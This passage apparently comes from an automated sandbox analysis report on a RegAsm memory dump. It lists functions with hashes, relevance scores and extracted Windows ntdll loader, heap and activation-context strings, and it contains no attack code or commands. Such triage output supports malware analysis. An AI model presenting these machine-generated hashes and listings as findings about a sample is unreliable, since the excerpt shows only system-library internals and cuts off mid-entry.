                • Opcode ID: fcde78dda0ae2ff287644f468f09c23e4fdcc5533a2c0ca37757b55b500552bc
                • Instruction ID: 9186819d3ce77dd9a57e91bc138075f9bab2161061d40394d2bb56a55aad2750
                • Opcode Fuzzy Hash: fcde78dda0ae2ff287644f468f09c23e4fdcc5533a2c0ca37757b55b500552bc
                • Instruction Fuzzy Hash: 3F313971B843559FD210EF68DD46E2BB795EF85B94F00059CFA856B290D620DC09CFA2
                Function 02F22674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                Download Yara Rule
                Strings
                • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 02F6219F
                • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 02F62178
                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 02F621BF
                • RtlGetAssemblyStorageRoot, xrefs: 02F62160, 02F6219A, 02F621BA
                • SXS: %s() passed the empty activation context, xrefs: 02F62165
                • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 02F62180
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID:
                • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                • API String ID: 0-861424205
                • Opcode ID: 371a8c8f186a396155c15c22baa2b4e7ea733c5b7e4410e99f3d08c218d86db8
                • Instruction ID: 14ea882b034ff9518dd97f1b9cdc1ebb4fd09cb39c9948693fe99a59dbfb1cd0
                • Opcode Fuzzy Hash: 371a8c8f186a396155c15c22baa2b4e7ea733c5b7e4410e99f3d08c218d86db8
                • Instruction Fuzzy Hash: D4310236F842386BFB218B958C85F6AB779DB66AD4F054159BF05BB240D3709E01C6A0
                Function 02F151EF Relevance: 6.7, Strings: 5, Instructions: 434COMMON
                Download Yara Rule
                Strings
                • WindowsExcludedProcs, xrefs: 02F1522A
                • Kernel-MUI-Language-Disallowed, xrefs: 02F15352
                • Kernel-MUI-Language-Allowed, xrefs: 02F1527B
                • Kernel-MUI-Number-Allowed, xrefs: 02F15247
                • Kernel-MUI-Language-SKU, xrefs: 02F1542B
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID:
                • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                • API String ID: 0-258546922
                • Opcode ID: a247b8618f97b90adfab54396e1b5cb239f01504684b758a4e383d49546053eb
                • Instruction ID: 5e8e4bb02c17506953596b4cc92a6b7a57b4d036e179cb38adc2b7efd4245325
                • Opcode Fuzzy Hash: a247b8618f97b90adfab54396e1b5cb239f01504684b758a4e383d49546053eb
                • Instruction Fuzzy Hash: 3BF13B72D01629EBCB16DF94C980AAEBBB9EF48794F91406AE601F7250D7749A01CB90
                Function 02F1D7B0 Relevance: 6.4, Strings: 5, Instructions: 151COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID:
                • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                • API String ID: 0-1975516107
                • Opcode ID: 1ee17579ba8b66be849fffc23c026a584944b5abcd6dd98a6b56a1d848ac654e
                • Instruction ID: 6564b2779898ccee36346f85f8d5f38d15b22495234eae740ab662d48a013751
                • Opcode Fuzzy Hash: 1ee17579ba8b66be849fffc23c026a584944b5abcd6dd98a6b56a1d848ac654e
                • Instruction Fuzzy Hash: E6511372E04349DFDF25DFA4C884BADBBB2BF447A8F944159DA026B281C7749851CF80
                Function 02EE76B2 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID:
                • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                • API String ID: 0-3061284088
                • Opcode ID: 4e51e901264fd7e52e7c715e68c0c1d10eb814ba5be9540e91d282d27cbd5bc4
                • Instruction ID: 944ca4b784e65bd672461d9e6ce7dbeb5ed8dc3468ad597dae71745a86ca7e0d
                • Opcode Fuzzy Hash: 4e51e901264fd7e52e7c715e68c0c1d10eb814ba5be9540e91d282d27cbd5bc4
                • Instruction Fuzzy Hash: D901F5329C4255DEE6299358D50AF62BBE8EB42BB9F24D01DF0064B6518AE5A881C960
                Function 02F070C0 Relevance: 6.0, Strings: 3, Instructions: 2248COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID:
                • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                • API String ID: 0-3178619729
                • Opcode ID: 39604236a165320ea78e8e24af9cf9bad1df226f3814a204f78d3edb46648057
                • Instruction ID: 90b8766df0d2593a1fa1a89c10c208d9b3e1757a99550e0c4b85acd35358514f
                • Opcode Fuzzy Hash: 39604236a165320ea78e8e24af9cf9bad1df226f3814a204f78d3edb46648057
                • Instruction Fuzzy Hash: CE13AF70E00655DFDB25CF68C890BA9FBF2BF48384F1481A9DA49AB381D734A945DF90
                Function 02F01070 Relevance: 5.9, Strings: 4, Instructions: 940COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID:
                • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                • API String ID: 0-3570731704
                • Opcode ID: 3ac1c48c551beadb7f079e2c8ff7611862a36d2c8a6577ff530d075bcfe22c1a
                • Instruction ID: b68d726c59032b93a9c30378e0328f0f035b4ec6ac73228bd4db8081af265d29
                • Opcode Fuzzy Hash: 3ac1c48c551beadb7f079e2c8ff7611862a36d2c8a6577ff530d075bcfe22c1a
                • Instruction Fuzzy Hash: B8923971E01269CFEB24CB14CC94BAAB7B6BF45394F0581E9EA4DA7290D7309E80CF51
                Function 02EFA3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID:
                • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                • API String ID: 0-379654539
                • Opcode ID: 4824d914f6c5f0e1c5fc41902560195c1d9109b20581608c1d8cc132317c0c5a
                • Instruction ID: dc38dbf7c18e230cb00839f22be7070bf308c84a76e365a372e48e5bfbfc095c
                • Opcode Fuzzy Hash: 4824d914f6c5f0e1c5fc41902560195c1d9109b20581608c1d8cc132317c0c5a
                • Instruction Fuzzy Hash: 62C19D70648386CFC751DF18C444BAAB7E4BF84748F00996AFE9A8B351E734CA49CB52
                Function 02F2273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                Download Yara Rule
                Strings
                • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 02F621D9, 02F622B1
                • SXS: %s() passed the empty activation context, xrefs: 02F621DE
                • .Local, xrefs: 02F228D8
                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 02F622B6
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID:
                • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                • API String ID: 0-1239276146
                • Opcode ID: bc7a51d4fb2d2378b5391322f16aa1d85ea0724e678cd6ab5a44313b500ce418
                • Instruction ID: 731bad5fe115026e2215dbd181533b5617d696b75f2a9da72ad8ffa53454060b
                • Opcode Fuzzy Hash: bc7a51d4fb2d2378b5391322f16aa1d85ea0724e678cd6ab5a44313b500ce418
                • Instruction Fuzzy Hash: 0BA1AF31E412299BDB24CF64CC98BA9B3B1BF59398F1441EADE08A7251D7309E85CF90
                Function 02EEF626 Relevance: 5.2, Strings: 4, Instructions: 188COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID:
                • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                • API String ID: 0-2586055223
                • Opcode ID: 591cdf8b364dd23e660f9af2f3141de9da443154dd3b408f04d1e00d16841b40
                • Instruction ID: 512578f7e0074d46e5523c9993971ddec5a6ededd4f773a030452256ecb449c0
                • Opcode Fuzzy Hash: 591cdf8b364dd23e660f9af2f3141de9da443154dd3b408f04d1e00d16841b40
                • Instruction Fuzzy Hash: 7F6155722403819FE721DB68CD44F677BE9FF84798F044468FA568B6A1DB74E800CB61
                Function 02FA11A4 Relevance: 5.1, Strings: 4, Instructions: 113COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID:
                • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                • API String ID: 0-336120773
                • Opcode ID: 8dfcdfa84becf9a48da705d14af0c5a57df40c56be864d993cb3beee4721162e
                • Instruction ID: 044dd2c8466c2bbed1a16e2acc6e963796c4f12b6c0625c3965b727ee6097baa
                • Opcode Fuzzy Hash: 8dfcdfa84becf9a48da705d14af0c5a57df40c56be864d993cb3beee4721162e
                • Instruction Fuzzy Hash: D3310072680110EFEB14DB98C890FA777E9EF047A8F2A4059F60ADB290D730ED40CE64
                Function 02EE9148 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID:
                • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                • API String ID: 0-1391187441
                • Opcode ID: 1eb955fb752c33744a6383c6e92c98ee060b0e8327337ca0e1cb502ebcc27f93
                • Instruction ID: d55f2d2c3703f355cf3763d568623b5f6bef30df359de6425c45bc58479ee7c0
                • Opcode Fuzzy Hash: 1eb955fb752c33744a6383c6e92c98ee060b0e8327337ca0e1cb502ebcc27f93
                • Instruction Fuzzy Hash: C0310632A80114EFDB01DB44CC84FAAB7F9FF44768F158055F916A7292DBB0ED41CA60
                Function 02F00770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID:
                • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                • API String ID: 0-4253913091
                • Opcode ID: e34c37d9055643d72ddb71ed05ee0b19d2a31fb30f51c0836c5710f3062a63fb
                • Instruction ID: 101dde33f97e5b80d6f4e5ccced3273d7bd9dc0429ffbf0b70a3b6310a883834
                • Opcode Fuzzy Hash: e34c37d9055643d72ddb71ed05ee0b19d2a31fb30f51c0836c5710f3062a63fb
                • Instruction Fuzzy Hash: 88F19A71B00605DFEB15CF68C894B6AB7F6FF44384F1481A8EA169B391DB34E981DB90
                Function 02EFB6C0 Relevance: 4.1, Strings: 3, Instructions: 303COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID:
                • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                • API String ID: 0-1145731471
                • Opcode ID: b80da4051d23754bba9d8bdd59c74f018c21934bea0a7fadcebbfb3ba7101537
                • Instruction ID: 64246011c4229914ac63ba62256b7b58630502da3d53204d48dea503e78a5f0a
                • Opcode Fuzzy Hash: b80da4051d23754bba9d8bdd59c74f018c21934bea0a7fadcebbfb3ba7101537
                • Instruction Fuzzy Hash: 43B1AF32E456648FCB29CF59C980FADB7B6AF48399F14856DEA51EB380D734E840CB50
                Function 02F7368C Relevance: 4.0, Strings: 3, Instructions: 292COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID:
                • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                • API String ID: 0-2391371766
                • Opcode ID: 169e3b56d3bc629c2be643c43da33a365878f10ecf4cb9d52ce2128a66cfc3cc
                • Instruction ID: 1ae70937234656603ed4f49d7be07663345e266c3f622407a65c28d1bd2873b4
                • Opcode Fuzzy Hash: 169e3b56d3bc629c2be643c43da33a365878f10ecf4cb9d52ce2128a66cfc3cc
                • Instruction Fuzzy Hash: 13B1CE72A44349BFE712DE54CC81F6BB7E9AB44794F00486AFB51EB280D770E804DB92
                Function 02EEA197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID:
                • String ID: FilterFullPath$UseFilter$\??\
                • API String ID: 0-2779062949
                • Opcode ID: 49eaf3e5c41b0e3af1eae88e77b14185fc4848bda807750aa3ca2f6932997ad9
                • Instruction ID: 78f9b64655b1f1230985c41a2937d17eb23143f24f8a0c3fd19d1d63c43fbde1
                • Opcode Fuzzy Hash: 49eaf3e5c41b0e3af1eae88e77b14185fc4848bda807750aa3ca2f6932997ad9
                • Instruction Fuzzy Hash: 98A18C71D012299BDB31DF24CC88BEAB7B9EF48744F1041EAEA09A7250DB759E84CF50
                Function 02F836EE Relevance: 4.0, Strings: 3, Instructions: 236COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID:
                • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                • API String ID: 0-318774311
                • Opcode ID: 0260937188d8393fa299da61e5724228cd770d054bcab013e1344c4d7135ad37
                • Instruction ID: ebb8863a3a6ed1931f1f1970addbd5d13819046841ec7bac007bf75bb4a25903
                • Opcode Fuzzy Hash: 0260937188d8393fa299da61e5724228cd770d054bcab013e1344c4d7135ad37
                • Instruction Fuzzy Hash: 0C818C72608345AFD711EB14C884F6AF7E9EF85B94F0409A9FE819B3A0D774D904CB52
                Function 02F2909C Relevance: 3.9, Strings: 3, Instructions: 199COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID:
                • String ID: %$&$@
                • API String ID: 0-1537733988
                • Opcode ID: 44ec923321b089b0cf75b3bc703e7e538222a7df411e01184c0074fe2350f757
                • Instruction ID: b30d446804abd1549a889fc994217152dd5d9076029dbe7ca6a2345a80d3e663
                • Opcode Fuzzy Hash: 44ec923321b089b0cf75b3bc703e7e538222a7df411e01184c0074fe2350f757
                • Instruction Fuzzy Hash: 7271E671A083119FD714DF21C984A2BBBE6FF86798F20491DF6A657290C770D909CF52
                Function 02FCB73C Relevance: 3.9, Strings: 3, Instructions: 180COMMON
                Download Yara Rule
                Strings
                • TargetNtPath, xrefs: 02FCB82F
                • GlobalizationUserSettings, xrefs: 02FCB834
                • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 02FCB82A
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID:
                • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                • API String ID: 0-505981995
                • Opcode ID: 07c4bf792172042eec6c10b7c2fe297970d5597d8820a3059607618d29dbd24b
                • Instruction ID: 98857dc2c034fd8d8d29895a47136f02dbc7e13771c96e24fe0d0e5fe93e97fa
                • Opcode Fuzzy Hash: 07c4bf792172042eec6c10b7c2fe297970d5597d8820a3059607618d29dbd24b
                • Instruction Fuzzy Hash: 6D61B032D4022DABDB31DB54CD89BDAB7B8AF04798F1101E9E608B7290C7349E80CF90
                Function 02EEF7BA Relevance: 3.9, Strings: 3, Instructions: 167COMMON
                Download Yara Rule
                Strings
                • HEAP: , xrefs: 02F4E6B3
                • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 02F4E6C6
                • HEAP[%wZ]: , xrefs: 02F4E6A6
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID:
                • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                • API String ID: 0-1340214556
                • Opcode ID: ddde9c2490571f0775f7dfaaf5a3789bac6bd45ad346a8c6163617a5720dc811
                • Instruction ID: 18e1821af98e2cca8dbd49f716b88e9c6a0ac56f91b9ad93c7ab053330f6e76b
                • Opcode Fuzzy Hash: ddde9c2490571f0775f7dfaaf5a3789bac6bd45ad346a8c6163617a5720dc811
                • Instruction Fuzzy Hash: 79512931640644EFEB12DBA8C994FAABBF9FF05344F1480A5E656CB692D774E900CF10
                Function 02F216CF Relevance: 3.9, Strings: 3, Instructions: 127COMMON
                Download Yara Rule
                Strings
                • LdrpAllocateTls, xrefs: 02F61B40
                • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 02F61B39
                • minkernel\ntdll\ldrtls.c, xrefs: 02F61B4A
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID:
                • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                • API String ID: 0-4274184382
                • Opcode ID: c48ead48e040e44673a979dd02791aa84ac79cd1765152f48e4d94cd078dc06e
                • Instruction ID: 7ea3163809ef10dac616e4c86bc3c5b093aed776e84a3270740e9b66c39f0639
                • Opcode Fuzzy Hash: c48ead48e040e44673a979dd02791aa84ac79cd1765152f48e4d94cd078dc06e
                • Instruction Fuzzy Hash: 8C418B75E40608EFDB15CFA8CC41AAEBBF6FF49784F048159E60AA7240D775A800CF94
                Function 02FAC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                Download Yara Rule
                Strings
                • PreferredUILanguages, xrefs: 02FAC212
                • @, xrefs: 02FAC1F1
                • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 02FAC1C5
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID:
                • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                • API String ID: 0-2968386058
                • Opcode ID: 649d83c8f195975ce293c56c0a210483c0a84d1ecc45ec45da38a9d8860c50e8
                • Instruction ID: e954cb8a4ef5e851b909a76e32717d4b1cc7dce638d17e431ef8c6e05778867e
                • Opcode Fuzzy Hash: 649d83c8f195975ce293c56c0a210483c0a84d1ecc45ec45da38a9d8860c50e8
                • Instruction Fuzzy Hash: 874150B2E00209EBDF11DAD4C8A1FEEB7F9AB54B84F14416BEA05F7280D7749A45CB50
                Function 02F84144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID:
                • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                • API String ID: 0-1373925480
                • Opcode ID: e0d08301c2d2b397d95ff5212e90bfb8fdad8182850784baf9a16230f503ab09
                • Instruction ID: 3e372ddd352a408bdba3106882c72c884c27c227fc541f11871c0c16b9ff0829
                • Opcode Fuzzy Hash: e0d08301c2d2b397d95ff5212e90bfb8fdad8182850784baf9a16230f503ab09
                • Instruction Fuzzy Hash: A841F332E046598BEB22EBA4CC44BADFBB5EF553C4F24045ADA01FB781DB348901CB11
                Function 02F74755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                Download Yara Rule
                Strings
                • minkernel\ntdll\ldrredirect.c, xrefs: 02F74899
                • LdrpCheckRedirection, xrefs: 02F7488F
                • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 02F74888
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID:
                • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                • API String ID: 0-3154609507
                • Opcode ID: fb9b4b778a1f63aac79cf2622830b9273009e8b96aa4bc1d012d4ca1bafb0b41
                • Instruction ID: 3d7e830aef1e64a349fa7b801162e635ce805f1773f92af1348b17763a4e1970
                • Opcode Fuzzy Hash: fb9b4b778a1f63aac79cf2622830b9273009e8b96aa4bc1d012d4ca1bafb0b41
                • Instruction Fuzzy Hash: F341C132F44298DBCB21CE68D940E26B7F9AF89BD4B05066EEE59DB211D730D811CB91
                Function 02F233A0 Relevance: 3.9, Strings: 3, Instructions: 111COMMON
                Download Yara Rule
                Strings
                • SXS: %s() passed the empty activation context data, xrefs: 02F629FE
                • RtlCreateActivationContext, xrefs: 02F629F9
                • Actx , xrefs: 02F233AC
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID:
                • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                • API String ID: 0-859632880
                • Opcode ID: 4d7487ca996a7204ba04297490e92ff60fbfa140e6303ebfbe412be29570bd8c
                • Instruction ID: ab2d68fcaa6febad93eca3f705a929a168e26e6d5f65409a75d68acc39f83f43
                • Opcode Fuzzy Hash: 4d7487ca996a7204ba04297490e92ff60fbfa140e6303ebfbe412be29570bd8c
                • Instruction Fuzzy Hash: 76318432A003159FEB26CE18CD84FA673A5EB45794F0484A9EE04DF285CB75E845CB90
                Function 02F21607 Relevance: 3.8, Strings: 3, Instructions: 98COMMON
                Download Yara Rule
                Strings
                • DLL "%wZ" has TLS information at %p, xrefs: 02F61A40
                • LdrpInitializeTls, xrefs: 02F61A47
                • minkernel\ntdll\ldrtls.c, xrefs: 02F61A51
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID:
                • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                • API String ID: 0-931879808
                • Opcode ID: 62262045243a75c6819f1024d16eb17e864fb2b41942be2b30c4e8070e095be9
                • Instruction ID: bbcd2808a45f901768ab3c94018df02232a4a7fb7a819494e682f8f9498f41eb
                • Opcode Fuzzy Hash: 62262045243a75c6819f1024d16eb17e864fb2b41942be2b30c4e8070e095be9
                • Instruction Fuzzy Hash: AA312832E40214EBEB218B58CC85F6FBB79FB417C8F440559E70AAB291D770AD048F94
                Function 02F31270 Relevance: 3.8, Strings: 3, Instructions: 97COMMON
                Download Yara Rule
                Strings
                • BuildLabEx, xrefs: 02F3130F
                • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 02F3127B
                • @, xrefs: 02F312A5
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID:
                • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                • API String ID: 0-3051831665
                • Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                • Instruction ID: 77bed58f55d83d0e086297c106c802120784640218324f47a9086087d7265ee4
                • Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                • Instruction Fuzzy Hash: 10316172A00519ABDF12AFA5CD44EEFBBBEEB84794F004425EA14A71A0D770DE05DF60
                Function 02F720DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                Download Yara Rule
                Strings
                • LdrpInitializationFailure, xrefs: 02F720FA
                • Process initialization failed with status 0x%08lx, xrefs: 02F720F3
                • minkernel\ntdll\ldrinit.c, xrefs: 02F72104
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID:
